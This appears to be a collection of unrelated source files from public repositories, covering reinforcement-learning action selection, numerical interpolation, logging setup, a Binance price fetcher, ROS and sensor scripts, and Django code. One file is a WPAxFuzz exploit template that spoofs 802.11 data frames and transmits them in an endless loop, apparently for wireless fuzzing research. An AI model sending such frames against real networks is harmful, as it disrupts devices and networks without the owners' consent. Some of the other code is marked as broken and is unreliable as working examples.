from mindspore import Tensor
import mindspore as ms
import numpy as np
from .epsilon_schedules import DecayThenFlatSchedule
REGISTRY = {}
class MultinomialActionSelector():
    """Samples actions from the agents' (availability-masked) policy distribution.

    NOTE(review): `Categorical` is never imported in this module, and
    `.clone()` / `.max(dim=...)` are PyTorch tensor APIs even though this file
    targets MindSpore — calling select_action() will raise NameError.  This
    class looks ported verbatim from the PyTorch PyMARL codebase; confirm
    before using it.
    """
    def __init__(self, args):
        self.args = args
        # Linear epsilon decay schedule (epsilon itself is unused in the
        # sampling branch below).
        self.schedule = DecayThenFlatSchedule(args.epsilon_start, args.epsilon_finish, args.epsilon_anneal_time,
                                              decay="linear")
        self.epsilon = self.schedule.eval(0)
        # When True, evaluation picks the argmax action instead of sampling.
        self.test_greedy = getattr(args, "test_greedy", True)
    def select_action(self, agent_inputs, avail_actions, t_env, test_mode=False):
        # Zero out the probability mass of unavailable actions.
        masked_policies = agent_inputs.clone()
        masked_policies[avail_actions == 0.0] = 0.0
        self.epsilon = self.schedule.eval(t_env)
        if test_mode and self.test_greedy:
            # Greedy: index 1 of max(dim=2) is the argmax (torch convention).
            picked_actions = masked_policies.max(dim=2)[1]
        else:
            picked_actions = Categorical(masked_policies).sample().long()
        return picked_actions
REGISTRY["multinomial"] = MultinomialActionSelector
class EpsilonGreedyActionSelector():
    """Epsilon-greedy action selection over per-agent Q-values (MindSpore).

    With probability epsilon each agent takes a uniformly random available
    action; otherwise the argmax over availability-masked Q-values.
    """
    def __init__(self, args):
        self.args = args
        # Linear decay from epsilon_start to epsilon_finish over
        # epsilon_anneal_time environment steps, then flat.
        self.schedule = DecayThenFlatSchedule(args.epsilon_start, args.epsilon_finish, args.epsilon_anneal_time,
                                              decay="linear")
        self.epsilon = self.schedule.eval(0)
    def select_action(self, agent_inputs, avail_actions, t_env, test_mode=False):
        # Assuming agent_inputs is a batch of Q-Values for each agent bav
        self.epsilon = self.schedule.eval(t_env)
        if test_mode:
            # Greedy action selection only
            self.epsilon = 0.0
        # mask actions that are excluded from selection
        masked_q_values = copy.deepcopy(agent_inputs)
        if self.args.evaluate_310:
            # Ascend 310 path: MindSpore tensors there do not support boolean
            # masking, so round-trip through numpy.
            masked_q_values = masked_q_values.asnumpy()
            avail_actions_np = avail_actions.asnumpy()
            masked_q_values[avail_actions_np == 0.0] = -float("inf")  # should never be selected!
            masked_q_values = Tensor(masked_q_values, ms.float32)
        else:
            masked_q_values[avail_actions == 0.0] = -float("inf")  # should never be selected!
        # One Bernoulli(epsilon) draw per (batch, agent).
        shape = agent_inputs[:, :, 0].shape
        random_numbers = Tensor(np.random.uniform(0, 1, shape), dtype=ms.float32)
        pick_random = (random_numbers < self.epsilon).astype("int32")
        # Sample one available action uniformly per agent.
        # NOTE(review): indexing avail_actions[0, i, :] assumes a batch
        # dimension of exactly 1 — confirm with callers.
        random_actions = []
        avail_actions = avail_actions.asnumpy()
        for i in range(avail_actions.shape[1]):
            pro = avail_actions[0, i, :].astype(np.float32) / avail_actions[0, i, :].sum()
            random_actions.append(np.random.choice(range(avail_actions.shape[2]), 1, p=pro)[0])
        random_actions = Tensor([random_actions], ms.int32)
        # Blend: random action where pick_random is 1, greedy argmax otherwise.
        picked_actions = pick_random * random_actions + (1 - pick_random) * masked_q_values.argmax(axis=2)
        return picked_actions
REGISTRY["epsilon_greedy"] = EpsilonGreedyActionSelector
| allyouneeds/QMIX-MindSpore | qmix/ascend_src/components/action_selectors.py | action_selectors.py | py | 2,947 | python | en | code | 0 | github-code | 50 |
18553143692 | import numpy as np
import math
import matplotlib.pyplot as plt
def fun(x):
    """Runge's function 1 / (25 x^2 + 1); works on scalars and numpy arrays."""
    return 1 / (25 * x ** 2 + 1)
'''
def myLagrange(xi: list, yi: list, data: list):
wyn = [0]*len(data)
for j in range(len(yi)):
wzr = yi[j]
for i in range(len(xi)):
if xi[i] - xi[j] != 0:
wzr *= (data - xi[i])/(xi[j] - xi[i])
wyn = wyn + wzr
return wyn
'''
def myLagrange(xi, yi):
    """Return the Lagrange interpolating polynomial through (xi, yi) as a callable.

    The returned function P evaluates sum_i yi[i] * L_i(x), where L_i is the
    Lagrange basis polynomial built from all knots with a different x-value.
    """
    def P(x):
        total = 0
        for i in range(len(xi)):
            # Basis polynomial L_i(x): product over every knot j with xj != xi.
            basis = 1
            for j in range(len(xi)):
                if xi[i] != xi[j]:
                    basis *= (x - xi[j]) / (xi[i] - xi[j])
            total += yi[i] * basis
        return total
    return P
def plot(f):
    """Plot f evaluated at the integers in [-10, 100) with a thick line.

    Bug fixed: `y = map(f, x)` produced a lazy iterator, so `print(y)` showed
    only `<map object ...>` and matplotlib could not coerce it into an array;
    the values are now materialized into a list.
    """
    x = range(-10, 100)
    y = [f(v) for v in x]
    print(y)
    plt.plot(x, y, linewidth=2.0)
# Dense grid on [-1, 1] used for plotting the reference function.
data = np.linspace(-1, 1, 100)
# 10 uniformly spaced parameter values for the interpolation knots.
k = np.linspace(-1, 1, 10)
# NOTE(review): cos is even and k is symmetric about 0, so cos(pi*k/10)
# produces pairwise-duplicated knot x-values clustered near 1; Chebyshev
# nodes are usually cos(pi*(2i+1)/(2n)) — confirm the intended formula.
knots = np.cos((math.pi*k)/10)
#knots = k
# NOTE(review): this evaluates f at the uniform grid k, not at the knot
# positions, so the interpolant passes through (knots[i], f(k[i])).
# Presumably this should be fun(knots) — confirm.
knots_value = fun(k)
P = myLagrange(knots, knots_value)
y = []
for i in data:
    y.append(fun(i))
plt.plot(data, y)
#plot(P)
| WykwalifikowanyProgramista7000/Numerki | spyder/lab5.py | lab5.py | py | 1,209 | python | en | code | 0 | github-code | 50 |
27670261237 | import nlp
import torch
from numpy import mean
from transformers import PreTrainedTokenizerBase
from Code.Model.bert_embedder import TooManyTokens
from Code.Utils.dataset_utils import get_wikipoints
from Code.Utils.eval_utils import get_acc_and_f1
from Config.options import max_examples
_test = None
def get_test(tokeniser: PreTrainedTokenizerBase):
global _test
if _test is None:
_test = get_wikipoints(tokeniser, split=nlp.Split.VALIDATION)
print("num valid ex:", len(_test))
return _test
def evaluate(model):
test_set = get_test(model.bert.tokenizer)
answers = []
predictions = []
chances = []
model.eval()
with torch.no_grad():
for i, ex in enumerate(test_set):
if i >= max_examples != -1:
break
try:
_, pred_ans = model(ex)
except TooManyTokens as e:
continue
answers.append([ex.answer])
predictions.append(pred_ans)
chances.append(1./len(ex.candidates))
model.last_example = -1
valid_acc = get_acc_and_f1(answers, predictions)['exact_match']
print("eval completed. Validation acc:", valid_acc, "chance:", mean(chances))
return valid_acc
| shaneacton/GraphPerceiver | Code/Training/eval.py | eval.py | py | 1,252 | python | en | code | 0 | github-code | 50 |
75170123355 | import logging
from logging import config as logging_config
from secrets import token_hex
from typing import Optional
from core.config import CONFIG
class RequestIdFilter(logging.Filter):
"""A class for an additional log message filter to add request ID information to the log messages."""
def __init__(self, request_id: Optional[str]):
"""Initialize the class with an optional request ID.
Args:
request_id (str): Unique request identifier.
"""
self.request_id = request_id or token_hex(nbytes=16)
def filter(self, record: logging.LogRecord) -> bool:
"""Filter method for adding log information to a record.
Args:
record (logging.LogRecord): The record being processed.
Returns:
bool: True to log the record.
"""
record.request_id = self.request_id
return True
LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
LOG_DEFAULT_HANDLERS = ['console']
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': LOG_FORMAT,
},
'default': {
'()': 'uvicorn.logging.DefaultFormatter',
'fmt': '%(levelprefix)s %(message)s',
'use_colors': None,
},
'access': {
'()': 'uvicorn.logging.AccessFormatter',
'fmt': "%(levelprefix)s %(client_addr)s - '%(request_line)s' %(status_code)s",
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
},
'default': {
'formatter': 'default',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stdout',
},
'access': {
'formatter': 'access',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stdout',
},
'logstash': {
'class': 'logstash.LogstashHandler',
'level': 'INFO',
'host': CONFIG.logstash.host,
'port': CONFIG.logstash.port,
},
},
'loggers': {
'app': {
'handlers': ['logstash', 'console'],
'level': 'INFO',
},
'uvicorn.error': {
'level': 'INFO',
'handlers': ['logstash'],
},
'uvicorn.access': {
'handlers': ['access', 'logstash'],
'level': 'INFO',
'propagate': False,
},
},
'root': {
'level': 'INFO',
'formatter': 'verbose',
'handlers': LOG_DEFAULT_HANDLERS,
},
}
logging_config.dictConfig(LOGGING)
| temirovazat/cinemax-async-api | backend/src/core/logger.py | logger.py | py | 2,723 | python | en | code | 0 | github-code | 50 |
9108268634 |
import os
import time
"""
Graphics in the console with Python.
"""
class ConsoleDisplay:
def __init__(self, wt: int, ht: int, char='█'):
self.wt = wt
self.ht = ht
self.char = char
self.surfaceStr = char * wt
self.draw_coords = []
def draw_surface(self):
for i in range(self.ht):
self.surfaceStr = self.char * self.wt
for c in self.draw_coords:
if i == c[1]:
tempList = list(self.surfaceStr)
tempList[c[0]] = c[2]
self.surfaceStr = ''.join(tempList)
print(self.surfaceStr)
def draw_point(self, x, y, char):
self.draw_coords.append((x, y, char))
def clear(self):
self.draw_coords = []
def update(self):
os.system('CLS') # Clear screen command
WT, HT = 40, 10
displayInstance = ConsoleDisplay(WT, HT)
MAXFPS = 60
sTime = 0
x = 0
y = 0
speedX = 1
speedY = 1
while 1:
fTime = time.time()
displayInstance.draw_point(x, y, 'O')
displayInstance.draw_surface()
x += speedX
y += speedY
if y > HT - 1 or y < 0:
speedY *= -1
if x > WT - 2 or x < 0:
speedX *= -1
if sTime > 0:
time.sleep(sTime)
lTime = time.time()
dTime = lTime - fTime
sTime = 1 / MAXFPS - dTime
print(1 / dTime, x, y)
displayInstance.clear()
displayInstance.update()
| SeanJxie/practice-programs | SingleFilePython/console_screen.py | console_screen.py | py | 1,246 | python | en | code | 1 | github-code | 50 |
1706055791 | from torch.utils.data import Dataset
import os,sys
sys.path.append('../')
import settings
import torch
import pandas as pd
import numpy as np
import cv2
from PIL import Image
from imgaug import augmenters as iaa
from sklearn.model_selection import KFold
config=settings.config
np.random.seed(8)
def overSampling(train_df:pd.DataFrame):
train_df_orig=train_df.copy()
lows = [15,15,15,8,9,10,15,8,9,27,10,8,9,10,17,15,20,24,15,26,15,27,15,20,24,17,8,15,27,27,15,27]
for i in lows:
target = str(i)
indicies = train_df_orig.loc[train_df_orig['Target'] == target].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
indicies = train_df_orig.loc[train_df_orig['Target'].str.startswith(target+" ")].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
indicies = train_df_orig.loc[train_df_orig['Target'].str.endswith(" "+target)].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
indicies = train_df_orig.loc[train_df_orig['Target'].str.contains(" "+target+" ")].index
train_df = pd.concat([train_df,train_df_orig.loc[indicies]], ignore_index=True)
return train_df
def read_train_dataset_info():
path_to_train = config['path_to_train']
data = pd.read_csv(config['train_csv'])
data=overSampling(data)
train_dataset_info = []
for name, labels in zip(data['Id'], data['Target'].str.split(' ')):
train_dataset_info.append({
'path': os.path.join(path_to_train, name),
'labels': np.array([int(label) for label in labels])})
print("the kaggle data is ",len(train_dataset_info))
extra_path=config['extra_data']
extra_csv=pd.read_csv(config['extra_csv'])
extra_csv=overSampling(extra_csv)
for name,labels in zip(extra_csv['Id'],extra_csv['Target'].str.split(' ')):
path=os.path.join(extra_path,name)
if os.path.exists(path+"_red.png") and os.path.exists(path+"_yellow.png") \
and os.path.exists(path+"_green.png") and os.path.exists(path+"_blue.png"):
train_dataset_info.append({
'path':os.path.join(extra_path,name),
'labels':np.array([int(label) for label in labels ])
})
print("the kaggle + extra data is ",len(train_dataset_info))
train_dataset_info = np.array(train_dataset_info)
return train_dataset_info
def statistic_class_imbalance():
train_data_info=read_train_dataset_info()
labels=np.zeros((28,),dtype=np.int32)
for data in train_data_info:
labels[data['labels']]+=1
kf=KFold(n_splits=5,random_state=8,shuffle=True)
last_train=[]
for train,test in kf.split(train_data_info):
print(train,len(train),np.all(train==last_train))
last_train=train.copy()
class DataLoad_protein(Dataset):
def __init__(self,dataset_info=None, batch_size=None, shape=None, augument=True):
super(DataLoad_protein, self).__init__()
assert shape[2]==4
self.dataset_info=dataset_info
self.batch_size=batch_size
self.shape=shape
self.augument=augument
def __len__(self):
return len(self.dataset_info)
def __getitem__(self, item):
if item>len(self.dataset_info):
item%=len(self.dataset_info)
while True:
path=self.dataset_info[item]['path']
if os.path.exists(path+"_red.png") and os.path.exists(path+"_yellow.png") and os.path.exists(path+"_green.png") and os.path.exists(path+"_blue.png"):
image=self.load_image(path,self.shape)
break
else:
print("the image is not exist",path)
item+=1
item%=len(self.dataset_info)
if self.augument:
image = self.augment(image)
label=np.zeros(shape=(28,))
label[self.dataset_info[item]['labels']]=1
image=image/255.#归一化
image=np.transpose(image,(2,0,1)).copy()
return torch.from_numpy(image),torch.FloatTensor(label)
def load_image_extra_data(self,path,shape):
image=Image.open("path")
print(np.array(image.shape))
def load_image(self,path,shape):
image_red_ch = Image.open(path + '_red.png')
image_yellow_ch = Image.open(path + '_yellow.png')
image_green_ch = Image.open(path + '_green.png')
image_blue_ch = Image.open(path + '_blue.png')
image = np.stack((
np.array(image_red_ch),
np.array(image_green_ch),
np.array(image_blue_ch),
np.array(image_yellow_ch)), -1)
image = cv2.resize(image, (shape[0], shape[1]))
return image
def augment(self,image):
augment_img = iaa.Sequential([
iaa.OneOf([
iaa.Affine(rotate=0),
iaa.Affine(rotate=90),
iaa.Affine(rotate=180),
iaa.Affine(rotate=270),
iaa.Fliplr(0.5),
iaa.Flipud(0.5),
])], random_order=True)
image_aug = augment_img.augment_image(image)
return image_aug
if __name__ == '__main__':
statistic_class_imbalance() | espectre/kaggle_Human-Protein-Atlas-Image-Classification | pytorch/Data.py | Data.py | py | 5,423 | python | en | code | 0 | github-code | 50 |
12091392547 | fav1 = ['pizza', 'nuggets', 'hotdog', 'noodles', 'pasta', 'burger']
fav2 = ['burger', 'hotdog', 'noodles', 'pasta', 'nuggets', 'pizza']
# find the min sum of indices for corresponding food in fav1 and fav2
# for example, pizza is at index 0 in fav1 and at index 5 in fav2
# so the sum of indices for pizza is 5
index1 = len(fav1)
index2 = len(fav2)
favourite_food = None
for i1 in range(index1):
i2 = fav2.index(fav1[i1])
if i1 + i2 < index1 + index2:
index1 = i1
index2 = i2
favourite_food = fav1[i1]
print(favourite_food, index1 + index2)
| Altmerian/learn-python | lists/favourite_food.py | favourite_food.py | py | 579 | python | en | code | 0 | github-code | 50 |
11661296522 | """Test suite for the management command sync_group_permissions."""
from django.core.management import call_command
from django.test import TestCase, override_settings
from machina.apps.forum_permission.shortcuts import assign_perm
from machina.core.db.models import get_model
from ashley.factories import ForumFactory, LTIContextFactory
from ashley.machina_extensions.forum.models import AbstractForum
from ashley.models import AbstractLTIContext
GroupForumPermission = get_model(
"forum_permission", "GroupForumPermission"
) # pylint: disable=C0103
class TestSyncGroupPermissionsCommand(TestCase):
"""Test the sync_group_permissions management command."""
def setUp(self):
super().setUp()
# Instanciate factories
self.lti_context_factory = LTIContextFactory
self.forum_factory = ForumFactory
def test_command(self):
"""Check the sync_group_permission behavior."""
# Create a LTI context and a forum
lti_context: AbstractLTIContext = self.lti_context_factory.create()
forum: AbstractForum = self.forum_factory.create()
forum.lti_contexts.add(lti_context)
# Setup a group for the LTI role `instructor` with some initial permissions
instructor_group = lti_context.get_role_group("instructor")
assign_perm("can_see_forum", instructor_group, forum)
assign_perm("can_read_forum", instructor_group, forum)
# Setup a group for the LTI role `another_role` with some initial permissions
another_group = lti_context.get_role_group("another_role")
assign_perm("can_see_forum", another_group, forum)
assign_perm("can_read_forum", another_group, forum)
assign_perm("can_approve_posts", another_group, forum)
# Check that our groups have the expected initial permissions
self.assertEqual(
["can_see_forum", "can_read_forum"],
self._get_group_forum_permissions(instructor_group, forum),
)
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
with override_settings(
ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS={
"instructor": ["can_see_forum", "can_lock_topics"]
}
):
# Run the command without argument
call_command("sync_group_permissions")
# By default, the command is in dry-run mode, so it should not have done anything
# in database.
self.assertEqual(
["can_see_forum", "can_read_forum"],
self._get_group_forum_permissions(instructor_group, forum),
)
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
# Run the command with the --apply argument, to execute real database updates
call_command("sync_group_permissions", "--apply")
# Check that missing groups have been added to our instructor group, according to
# the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting
self.assertEqual(
["can_see_forum", "can_read_forum", "can_lock_topics"],
self._get_group_forum_permissions(instructor_group, forum),
)
# another_group should have its initial permissions, since it's
# not mentionned in the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting.
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
# Run the command with the --remove-extra-permissions to revoke group
# permissions that are not defined in the settings
call_command(
"sync_group_permissions", "--apply", "--remove-extra-permissions"
)
# Check that extra groups have been revoked from instructor group, according to
# the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting
self.assertEqual(
["can_see_forum", "can_lock_topics"],
self._get_group_forum_permissions(instructor_group, forum),
)
# another_group should have its initial permissions, since it's
# not mentionned in the ASHLEY_DEFAULT_FORUM_ROLES_PERMISSIONS setting.
self.assertEqual(
["can_see_forum", "can_read_forum", "can_approve_posts"],
self._get_group_forum_permissions(another_group, forum),
)
@staticmethod
def _get_group_forum_permissions(group, forum):
return list(
GroupForumPermission.objects.filter(
forum=forum, group=group, has_perm=True
).values_list("permission__codename", flat=True)
)
| openfun/ashley | tests/ashley/management/commands/test_sync_group_permissions.py | test_sync_group_permissions.py | py | 5,009 | python | en | code | 11 | github-code | 50 |
10418957717 | from datetime import datetime, timedelta
import pandas as pd
from binance.client import Client as BinanceClient
from utils.secrets import get_binance_secret
# Human-readable interval name -> python-binance kline interval constant.
# Fix: the "15MINUTE", "30MINUTE" and "12HOUR" keys previously contained a
# trailing space, so lookups with the clean names documented in
# get_portfolio_data() missed and silently fell back to the 1-day default.
interval_mapping = {
    "1MINUTE": BinanceClient.KLINE_INTERVAL_1MINUTE,
    "3MINUTE": BinanceClient.KLINE_INTERVAL_3MINUTE,
    "5MINUTE": BinanceClient.KLINE_INTERVAL_5MINUTE,
    "15MINUTE": BinanceClient.KLINE_INTERVAL_15MINUTE,
    "30MINUTE": BinanceClient.KLINE_INTERVAL_30MINUTE,
    "1HOUR": BinanceClient.KLINE_INTERVAL_1HOUR,
    "2HOUR": BinanceClient.KLINE_INTERVAL_2HOUR,
    "4HOUR": BinanceClient.KLINE_INTERVAL_4HOUR,
    "6HOUR": BinanceClient.KLINE_INTERVAL_6HOUR,
    "8HOUR": BinanceClient.KLINE_INTERVAL_8HOUR,
    "12HOUR": BinanceClient.KLINE_INTERVAL_12HOUR,
    "1DAY": BinanceClient.KLINE_INTERVAL_1DAY,
    "3DAY": BinanceClient.KLINE_INTERVAL_3DAY,
    "1WEEK": BinanceClient.KLINE_INTERVAL_1WEEK,
    "1MONTH": BinanceClient.KLINE_INTERVAL_1MONTH
}
def _get_client():
    """Build an authenticated Binance client from the stored API secrets.

    Any exception raised by the client constructor propagates unchanged.
    """
    return BinanceClient(*get_binance_secret())
def BinanceDataFrame(klines):
    """Convert raw Binance klines into a float DataFrame indexed by open-time datetime.

    :param klines: list of 12-field kline rows as returned by the Binance API.
    :return: DataFrame with a 'Datetime' index derived from 'Open Time' (ms).
    """
    columns = [
        'Open Time',
        'Open',
        'High',
        'Low',
        'Close',
        'Volume',
        'Close time',
        'Quote asset volume',
        'Number of trades',
        'Taker buy base asset volume',
        'Taker buy quote asset volume',
        'Ignore',
    ]
    asset = pd.DataFrame(klines, dtype=float, columns=columns)
    # 'Open Time' is a Unix timestamp in milliseconds.
    asset['Datetime'] = pd.to_datetime(asset['Open Time'], unit='ms')
    asset.reset_index(drop=True, inplace=True)
    return asset.set_index('Datetime')
def get_usdt_tickers(coins: list = None) -> list:
    """
    Return USDT-quoted ticker symbols available on Binance.

    :param coins: optional list of base-asset tickers (e.g. ["BTC", "ETH"]);
        when None or empty, every USDT pair is returned.  (The original
        raised on the default None, contradicting its own documentation.)
    :return: a list of USDT based tickers matching the given coins
    :raises Exception: if *coins* is neither None nor a list.
    """
    client = _get_client()
    if coins is not None and not isinstance(coins, list):
        raise Exception('coins argument should be a list')
    all_ticker = client.get_all_tickers()
    # Keep only pairs quoted in USDT.
    usd_tickers = [t.get('symbol') for t in all_ticker
                   if t.get('symbol').endswith('USDT')]
    if not coins:
        return usd_tickers
    ticker_response = []
    for ticker in usd_tickers:
        for coin in coins:
            # _is_usdt_valid filters out derivative pairs such as BTCDOWNUSDT.
            if ticker.startswith(coin) and _is_usdt_valid(coin, ticker):
                ticker_response.append(ticker)
    return ticker_response
def get_portfolio_data(tickers,
                       start_date,
                       end_date=None,
                       interval="1DAY"):
    """
    Fetch closing prices for the USDT pairs of *tickers* into one DataFrame
    (one column per coin, USDT suffix stripped, indexed by candle open time).

    Example date format: December 1, 2021 UTC
    Example timestamp date format:
        dt_string = '18/09/19 01:55:19'
        dt = datetime.strptime(dt_string, '%d/%m/%y %H:%M:%S')
        start = int(dt.timestamp() * 1000)
    Intervals: "1MINUTE", "3MINUTE", "5MINUTE", "15MINUTE ", "30MINUTE ",
               "1HOUR", "2HOUR", "4HOUR", "6HOUR", "8HOUR",
               "12HOUR ", "1DAY", "3DAY", "1WEEK", "1MONTH"
    Default interval: "1DAY"
    """
    client = _get_client()
    # Resolve the requested coins to their tradable USDT pair symbols.
    tickers = get_usdt_tickers(tickers)
    if not isinstance(tickers, list):
        raise Exception(f"Invalid ticker format, should be list got {type(tickers)}")
    # Unknown interval names fall back to daily candles.
    interval = interval_mapping.get(interval)
    if not interval:
        interval = interval_mapping["1DAY"]
    portfolio = pd.DataFrame()
    try:
        for asset in tickers:
            klines = client.get_historical_klines(
                symbol=asset,
                interval=interval,
                start_str=start_date,
                end_str=end_date)
            closing_price = BinanceDataFrame(klines)['Close']
            # Column name is the coin without the USDT suffix, e.g. "BTC".
            portfolio[f"{asset.replace('USDT','')}"] = closing_price
    except Exception as e:
        raise
    return portfolio
def _is_usdt_valid(coin, ticker):
allowed = ['BTC', 'ETH', 'BNB', 'ETH']
if coin in allowed:
if ticker != f'{coin}USDT':
return False
return True
def get_historical(coin,
                   start_date,
                   end_date=None,
                   interval="1DAY"):
    """
    Fetch closing prices for a single coin's USDT pair into a one-column DataFrame.

    Example date format: December 1, 2021 UTC
    Example timestamp date format:
        dt_string = '18/09/19 01:55:19'
        dt = datetime.strptime(dt_string, '%d/%m/%y %H:%M:%S')
        start = int(dt.timestamp() * 1000)
    Intervals: "1MINUTE", "3MINUTE", "5MINUTE", "15MINUTE ", "30MINUTE ",
               "1HOUR", "2HOUR", "4HOUR", "6HOUR", "8HOUR",
               "12HOUR ", "1DAY", "3DAY", "1WEEK", "1MONTH"
    Default interval: "1DAY"

    :raises Exception: if no, or more than one, USDT ticker matches *coin*.
    """
    client = _get_client()
    ticker = get_usdt_tickers([coin])
    if not ticker:
        raise Exception("Ticker not found: {}".format(coin))
    if len(ticker) > 1:
        raise Exception("Multiple tickers found: {}".format(ticker))
    ticker = ticker.pop()
    # Unknown interval names fall back to daily candles.
    interval = interval_mapping.get(interval)
    if not interval:
        interval = interval_mapping["1DAY"]
    data = pd.DataFrame()
    try:
        klines = client.get_historical_klines(
            symbol=ticker,
            interval=interval,
            start_str=start_date,
            end_str=end_date)
        closing_price = BinanceDataFrame(klines)['Close']
    except Exception as e:
        raise
    data[f"{coin}"] = closing_price
    return data
def get_months_ago(coins, n=31):
    """Fetch daily closing prices for *coins* starting *n* days ago (default 31)."""
    cutoff_ms = int((datetime.today() - timedelta(days=n)).timestamp() * 1000)
    return get_portfolio_data(coins, cutoff_ms)
def get_weeks_ago(coins, n=7):
    """Fetch daily closing prices for *coins* starting *n* days ago (default 7)."""
    cutoff_ms = int((datetime.today() - timedelta(days=n)).timestamp() * 1000)
    return get_portfolio_data(coins, cutoff_ms)
def get_years_ago(coins, n=365):
    """Fetch daily closing prices for *coins* starting *n* days ago (default 365)."""
    cutoff_ms = int((datetime.today() - timedelta(days=n)).timestamp() * 1000)
    return get_portfolio_data(coins, cutoff_ms)
def get_price_variation(interval, coins):
    """
    Return a formatted message with the percentage price variation of *coins*
    over the given *interval* ("month", "week" or "year").

    :raises Exception: if *interval* is not one of the supported keys.
    """
    handler = {
        'month': get_months_ago,
        'week': get_weeks_ago,
        'year': get_years_ago,
    }
    if interval not in handler:
        raise Exception("[get_price_variation] Invalid interval {}".format(interval))
    data = handler[interval](coins)
    # Percentage change between the first and the last row of each series.
    data = ((data.diff(len(data)-1).dropna() / data.iloc[-1:]) * 100).round(1)
    # DataFrame.iteritems() was removed in pandas 2.0 — use items(); use
    # positional iloc access into each one-row column Series.
    variations = {coin: _get_symbol(variation.iloc[0]) for coin, variation in data.items()}
    return _prepare_variation_message(variations)
def _get_symbol(variation):
if variation <= 0:
return '🔴' + ' ' + str(variation) + '%'
return '🟢' + ' ' + str(variation) + '%'
def _prepare_variation_message(variations):
"""
Assemble variations and build a message to be send
:param dict variations: dictionary with the variations eg. {'BTC': -3.5}
"""
message = "\n".join("{} {}".format(k,v) for k,v in variations.items())
return message
| c4road/wp-bot-cdk | wp-sns-lambda/services/binance.py | binance.py | py | 7,189 | python | en | code | 0 | github-code | 50 |
74536154715 | from scapy.all import Dot11, RadioTap, sendp
from random import randint
# NOTE(review): this file is a fuzzing template, not directly runnable Python —
# {SUBTYPE}, {FCf}, {DESTINATION_MAC}, {SOURCE_MAC}, {AP_MAC}, {SC}, {SEED} and
# {ATT_INTERFACE} are placeholders substituted by the generator before
# execution (presumably via str.format; confirm against the caller).
# Build the fuzzed 802.11 MAC header (type=2 is a Data frame).
dot11 = Dot11(type=2, subtype={SUBTYPE}, FCfield={FCf}, addr1={DESTINATION_MAC}, addr2={SOURCE_MAC}, addr3={AP_MAC}, SC={SC}, addr4={SOURCE_MAC})
MAC_header = RadioTap()/dot11
payload = {SEED}  # fuzzed frame body
frame = MAC_header / payload
print('\n- - - - - - - - - - - - - - - -')
print('Testing the exploit')
print('- - - - - - - - - - - - - - - - ')
# Transmit the crafted frame repeatedly on the attack interface.
while True:
    sendp(frame, count=1, iface={ATT_INTERFACE}, verbose=0)
| efchatz/WPAxFuzz | exploits/exploit_data.py | exploit_data.py | py | 484 | python | en | code | 120 | github-code | 50 |
3144955621 | #!/usr/bin/env python
import rospy
from blockChainPack_.msg import lastHash
# Known peer node names; nodeONOFF holds the index-aligned online flags.
nodeList = ['NODE1', 'NODE2', 'NODE3']
nodeONOFF = [1,0,0]  # this node (NODE1) starts marked online
oldNodeONOFF = [0,0,0]  # previous snapshot; appears unused in this script
def callback(data):
    """Mark the reporting node as online when its last-hash message arrives."""
    name = data.nodeName
    if name in nodeList:
        nodeONOFF[nodeList.index(name)] = 1
        print(nodeONOFF)
def main():
    """Subscribe to the Last_Hash topic and block until the node is shut down."""
    rospy.Subscriber('Last_Hash', lastHash, callback)
    rospy.spin()
if __name__ == '__main__':
    # `anonymous` expects a boolean; the original passed the string "True",
    # which is truthy and behaved the same but was misleading.
    rospy.init_node('authentication', anonymous=True)
    main()
# create all the node folders
# get all nodes to send their text files
# run a comparison script, find the average
# if identical, blockchain isn't compromised
# if not identical, reissue node with uncompromised files
# maybe write a custom message
# what about just sending the last block hash from each blockchain, if the strings don't match, authentication fails.
# | willdavis576/BlockChainResearch | 00blockChain_ws/src/blockChainPack_/src/scripts/Unused Currently/authentication1.py | authentication1.py | py | 845 | python | en | code | 0 | github-code | 50 |
18741540647 | # import spidevRead as sr
import time
import serial
import dbConn as dC
ser = serial.Serial('/dev/ttyAMA0', 9600, timeout=1)
# Map each serial-line marker to its DB insert function and display label,
# so all four sensors share one handling path instead of four copied blocks.
SENSOR_HANDLERS = (
    ("temperature:", dC.insertSensor1, "Temperature"),
    ("humidity:", dC.insertSensor2, "Humidity"),
    ("light :", dC.insertSensor3, "light"),
    ("soil :", dC.insertSensor4, "soil"),
)
while True:
    # Read one line of sensor output from the serial port and decode it.
    data = ser.readline().decode()
    for marker, insert_row, label in SENSOR_HANDLERS:
        if marker in data:
            # The integer value follows the first colon, e.g. "humidity:42".
            value = int(data.split(":")[1])
            insert_row(value)
            print(label + ":", value)
            time.sleep(1)
| CoreanAnt/iot_project | PyQT/etc/sensordb/ex11_sensorDB.py | ex11_sensorDB.py | py | 1,268 | python | en | code | 0 | github-code | 50 |
33599419364 | from django.shortcuts import render
from .updateTables import updateTables
from .models import parkingLot, parkingSpot
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.http import JsonResponse
from datetime import datetime, timezone
from django.views.decorators.cache import never_cache
@never_cache # don't cache pictures - important for displaying updated pictures of lots
def parking(request):
    """Render the parking page: refresh the segmentation tables when stale,
    then serialise lot/spot positions and segmented-image paths for the
    template (Geoposition fields must be flattened before JSON encoding)."""
    # get parkingLot and parkingSpot tables
    parking_lots = parkingLot.objects.all()
    parking_spots = parkingSpot.objects.all()
    # find elapsed time since images segmented
    now = datetime.now(timezone.utc)
    first_lot_time = parking_lots[0].lastUpdate
    elapsed_time = now - first_lot_time
    print(elapsed_time.seconds)
    # call updateTables() if it has been more than 300 seconds since the tables were last updated
